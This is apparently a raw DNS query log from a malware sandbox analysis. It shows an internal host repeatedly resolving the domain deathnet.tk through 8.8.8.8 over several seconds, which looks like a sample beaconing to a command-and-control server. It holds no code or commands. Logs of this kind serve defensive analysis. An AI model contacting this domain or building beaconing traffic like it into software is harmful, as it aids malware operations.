              Mar 21, 2022 20:08:26.184638977 CET192.168.2.238.8.8.80x3192Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.229999065 CET192.168.2.238.8.8.80x2294Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.273149014 CET192.168.2.238.8.8.80x24daStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.318739891 CET192.168.2.238.8.8.80xd952Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.364717960 CET192.168.2.238.8.8.80x3d00Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.409607887 CET192.168.2.238.8.8.80x87e1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.455038071 CET192.168.2.238.8.8.80xac66Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.498574018 CET192.168.2.238.8.8.80x47c8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.543345928 CET192.168.2.238.8.8.80x43f1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.590440989 CET192.168.2.238.8.8.80x77bbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.641303062 CET192.168.2.238.8.8.80x46d7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.684711933 CET192.168.2.238.8.8.80xd94fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.730133057 CET192.168.2.238.8.8.80x9202Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.775372028 CET192.168.2.238.8.8.80x238fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.821618080 CET192.168.2.238.8.8.80x7b9dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.864919901 CET192.168.2.238.8.8.80x7e13Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.910228968 CET192.168.2.238.8.8.80xc30cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.954864025 CET192.168.2.238.8.8.80x19e6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:26.997704983 CET192.168.2.238.8.8.80x91d7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.042534113 CET192.168.2.238.8.8.80x1723Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.089385033 CET192.168.2.238.8.8.80x8109Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.132572889 CET192.168.2.238.8.8.80xd79fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.180891037 CET192.168.2.238.8.8.80x2e07Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.225029945 CET192.168.2.238.8.8.80x7545Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.270457029 CET192.168.2.238.8.8.80x77a9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.313471079 CET192.168.2.238.8.8.80xb7feStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.358737946 CET192.168.2.238.8.8.80xca4aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.403208971 CET192.168.2.238.8.8.80xcc3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.448004961 CET192.168.2.238.8.8.80xaf4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.492423058 CET192.168.2.238.8.8.80x8fa2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.535166979 CET192.168.2.238.8.8.80xfeefStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.577879906 CET192.168.2.238.8.8.80xbc2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.623943090 CET192.168.2.238.8.8.80x6fc9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.669254065 CET192.168.2.238.8.8.80xe141Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.711694002 CET192.168.2.238.8.8.80x1c15Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.756874084 CET192.168.2.238.8.8.80x5d41Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.801866055 CET192.168.2.238.8.8.80x79beStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.847146034 CET192.168.2.238.8.8.80xec51Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.900665045 CET192.168.2.238.8.8.80xfd9eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.944986105 CET192.168.2.238.8.8.80x2644Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:27.989691019 CET192.168.2.238.8.8.80xe3c0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.034024954 CET192.168.2.238.8.8.80xfedaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.081877947 CET192.168.2.238.8.8.80x36f0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.126543999 CET192.168.2.238.8.8.80x60beStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.172837973 CET192.168.2.238.8.8.80x1bc8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.218194008 CET192.168.2.238.8.8.80xa809Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.262833118 CET192.168.2.238.8.8.80x6066Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.307518005 CET192.168.2.238.8.8.80x840bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.352047920 CET192.168.2.238.8.8.80x9208Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.397325993 CET192.168.2.238.8.8.80x27d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.442442894 CET192.168.2.238.8.8.80xfe5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.486531973 CET192.168.2.238.8.8.80x3c58Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.544264078 CET192.168.2.238.8.8.80x136fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.586622000 CET192.168.2.238.8.8.80x3969Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.631047964 CET192.168.2.238.8.8.80xdf20Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.673547029 CET192.168.2.238.8.8.80xa0bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.719378948 CET192.168.2.238.8.8.80xa4e6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.764314890 CET192.168.2.238.8.8.80x8d36Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.808729887 CET192.168.2.238.8.8.80xb1adStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.854000092 CET192.168.2.238.8.8.80x1f22Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.896229029 CET192.168.2.238.8.8.80x172Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.940857887 CET192.168.2.238.8.8.80x2b9eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:28.983663082 CET192.168.2.238.8.8.80x3b9aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.032706976 CET192.168.2.238.8.8.80xeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.075541019 CET192.168.2.238.8.8.80xce87Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.118129015 CET192.168.2.238.8.8.80x450eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.161111116 CET192.168.2.238.8.8.80x8d57Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.206315041 CET192.168.2.238.8.8.80xfb47Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.256716967 CET192.168.2.238.8.8.80x7bd0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.301270962 CET192.168.2.238.8.8.80xed65Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.346533060 CET192.168.2.238.8.8.80xf1c8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.392893076 CET192.168.2.238.8.8.80xc7ebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.441133022 CET192.168.2.238.8.8.80x299eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.488924026 CET192.168.2.238.8.8.80xd7a7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.536514997 CET192.168.2.238.8.8.80x131fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.581635952 CET192.168.2.238.8.8.80x30eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.630137920 CET192.168.2.238.8.8.80xcdc8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.683887005 CET192.168.2.238.8.8.80xf1f8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.733900070 CET192.168.2.238.8.8.80x3dd9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.790239096 CET192.168.2.238.8.8.80x945cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.840701103 CET192.168.2.238.8.8.80x1996Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.890152931 CET192.168.2.238.8.8.80x3ca4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:29.941880941 CET192.168.2.238.8.8.80xd54fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:30.058751106 CET192.168.2.238.8.8.80xb4e0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.062446117 CET192.168.2.238.8.8.80xb4e0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.105109930 CET192.168.2.238.8.8.80xef75Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.147433043 CET192.168.2.238.8.8.80xb234Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.192080975 CET192.168.2.238.8.8.80x28f1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.235405922 CET192.168.2.238.8.8.80xab9eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.280139923 CET192.168.2.238.8.8.80x5c8bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.324418068 CET192.168.2.238.8.8.80x1cfaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.369019985 CET192.168.2.238.8.8.80x5731Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.413655043 CET192.168.2.238.8.8.80xead7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.460315943 CET192.168.2.238.8.8.80x5a2fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.510355949 CET192.168.2.238.8.8.80x1f1fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.557790995 CET192.168.2.238.8.8.80xd99fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.606254101 CET192.168.2.238.8.8.80xe708Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.654413939 CET192.168.2.238.8.8.80x9ddbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.700299978 CET192.168.2.238.8.8.80x887bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.744328022 CET192.168.2.238.8.8.80x67efStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.788383007 CET192.168.2.238.8.8.80x62c2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.837469101 CET192.168.2.238.8.8.80x691dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.886359930 CET192.168.2.238.8.8.80xf774Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.932794094 CET192.168.2.238.8.8.80xda5eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:35.978377104 CET192.168.2.238.8.8.80x7e73Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.022408009 CET192.168.2.238.8.8.80xa6e7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.069094896 CET192.168.2.238.8.8.80xd331Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.117204905 CET192.168.2.238.8.8.80x8146Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.165383101 CET192.168.2.238.8.8.80x22e6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.212987900 CET192.168.2.238.8.8.80x26c5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.264787912 CET192.168.2.238.8.8.80xe081Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.310379982 CET192.168.2.238.8.8.80x125cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.356405973 CET192.168.2.238.8.8.80x9dfbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.399622917 CET192.168.2.238.8.8.80x528eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.443042994 CET192.168.2.238.8.8.80xc270Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.488496065 CET192.168.2.238.8.8.80x5ff7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.532589912 CET192.168.2.238.8.8.80x1df2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.577128887 CET192.168.2.238.8.8.80x79cbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.622428894 CET192.168.2.238.8.8.80xd8c7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.665333986 CET192.168.2.238.8.8.80x51e0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.708374977 CET192.168.2.238.8.8.80xfc84Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.753772974 CET192.168.2.238.8.8.80x1fa5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.797486067 CET192.168.2.238.8.8.80xefc8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.840034008 CET192.168.2.238.8.8.80x3fa8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.882352114 CET192.168.2.238.8.8.80xee29Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.927148104 CET192.168.2.238.8.8.80x43e4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:36.972131968 CET192.168.2.238.8.8.80x14a1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.014554977 CET192.168.2.238.8.8.80xaa29Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.058705091 CET192.168.2.238.8.8.80xfde3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.101804972 CET192.168.2.238.8.8.80x232dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.146569014 CET192.168.2.238.8.8.80x1c0cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.192893028 CET192.168.2.238.8.8.80x4720Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.238502979 CET192.168.2.238.8.8.80x100cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.283427000 CET192.168.2.238.8.8.80x3a7fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.327641010 CET192.168.2.238.8.8.80x8adfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.370958090 CET192.168.2.238.8.8.80x4d5aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.415817022 CET192.168.2.238.8.8.80xfcfeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.463706970 CET192.168.2.238.8.8.80xff53Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.508666039 CET192.168.2.238.8.8.80x7d24Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.555947065 CET192.168.2.238.8.8.80xeb39Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.600457907 CET192.168.2.238.8.8.80xd3bcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.644551992 CET192.168.2.238.8.8.80x9134Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.690000057 CET192.168.2.238.8.8.80xd84Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.736711025 CET192.168.2.238.8.8.80xa588Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.779689074 CET192.168.2.238.8.8.80x7ed5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.827894926 CET192.168.2.238.8.8.80xc8c1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.877319098 CET192.168.2.238.8.8.80xbf9fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.924496889 CET192.168.2.238.8.8.80x2658Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:37.967118979 CET192.168.2.238.8.8.80x9ccaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.010200977 CET192.168.2.238.8.8.80x94feStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.054689884 CET192.168.2.238.8.8.80x10c0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.099461079 CET192.168.2.238.8.8.80xc312Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.147640944 CET192.168.2.238.8.8.80x32e2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.193134069 CET192.168.2.238.8.8.80xefcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.238627911 CET192.168.2.238.8.8.80x8b8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.283271074 CET192.168.2.238.8.8.80xf3e0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.328005075 CET192.168.2.238.8.8.80x630Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.372325897 CET192.168.2.238.8.8.80xfb74Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.418219090 CET192.168.2.238.8.8.80xb4bbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.460743904 CET192.168.2.238.8.8.80x8b3eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.505422115 CET192.168.2.238.8.8.80x5e9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.550457001 CET192.168.2.238.8.8.80x4f40Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.596339941 CET192.168.2.238.8.8.80xf24fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.640079975 CET192.168.2.238.8.8.80x8de1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.686250925 CET192.168.2.238.8.8.80xd7dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.729325056 CET192.168.2.238.8.8.80x6d56Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.775012016 CET192.168.2.238.8.8.80x9a5dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.820017099 CET192.168.2.238.8.8.80x23b0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.869390011 CET192.168.2.238.8.8.80x6157Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.914135933 CET192.168.2.238.8.8.80xb169Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:38.961987972 CET192.168.2.238.8.8.80xf7a5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.006635904 CET192.168.2.238.8.8.80x88e3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.051184893 CET192.168.2.238.8.8.80xe23aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.094182968 CET192.168.2.238.8.8.80x97f8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.138700962 CET192.168.2.238.8.8.80xf8b8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.186523914 CET192.168.2.238.8.8.80x63b9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.232255936 CET192.168.2.238.8.8.80xe38aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.276987076 CET192.168.2.238.8.8.80x158Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.321528912 CET192.168.2.238.8.8.80xafdeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.366796017 CET192.168.2.238.8.8.80xc16cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.412827969 CET192.168.2.238.8.8.80xc0deStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.458853006 CET192.168.2.238.8.8.80x1c12Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.503846884 CET192.168.2.238.8.8.80x13edStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.551359892 CET192.168.2.238.8.8.80xa3ddStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.595585108 CET192.168.2.238.8.8.80xc25Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.641108036 CET192.168.2.238.8.8.80x54f1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.686273098 CET192.168.2.238.8.8.80x2e80Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.731971979 CET192.168.2.238.8.8.80xe6d2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.776164055 CET192.168.2.238.8.8.80x91ecStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.821969032 CET192.168.2.238.8.8.80x8bcfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.876465082 CET192.168.2.238.8.8.80xc640Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.920146942 CET192.168.2.238.8.8.80xfd6fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:39.965301991 CET192.168.2.238.8.8.80x7502Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.010493994 CET192.168.2.238.8.8.80x549dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.055597067 CET192.168.2.238.8.8.80xbe15Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.102508068 CET192.168.2.238.8.8.80x1776Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.145262957 CET192.168.2.238.8.8.80x29f4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.189178944 CET192.168.2.238.8.8.80x47c7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.234613895 CET192.168.2.238.8.8.80xc3e2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.280935049 CET192.168.2.238.8.8.80xc1d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.327831984 CET192.168.2.238.8.8.80xe981Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.378606081 CET192.168.2.238.8.8.80x86bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.428133965 CET192.168.2.238.8.8.80x3ebeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.472970963 CET192.168.2.238.8.8.80xde82Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.800591946 CET192.168.2.238.8.8.80x167Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.844965935 CET192.168.2.238.8.8.80x1cd4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.894121885 CET192.168.2.238.8.8.80xd84cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.941018105 CET192.168.2.238.8.8.80x29b4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:40.989007950 CET192.168.2.238.8.8.80x718cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.036293983 CET192.168.2.238.8.8.80x2b54Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.081312895 CET192.168.2.238.8.8.80xebdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.129966021 CET192.168.2.238.8.8.80xa390Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.181049109 CET192.168.2.238.8.8.80x8520Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.228902102 CET192.168.2.238.8.8.80xbe7eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.276133060 CET192.168.2.238.8.8.80xba23Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.615839958 CET192.168.2.238.8.8.80x1454Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:41.661189079 CET192.168.2.238.8.8.80xb971Standard query (0)deathnet.tkA (IP address)IN (0x0001)
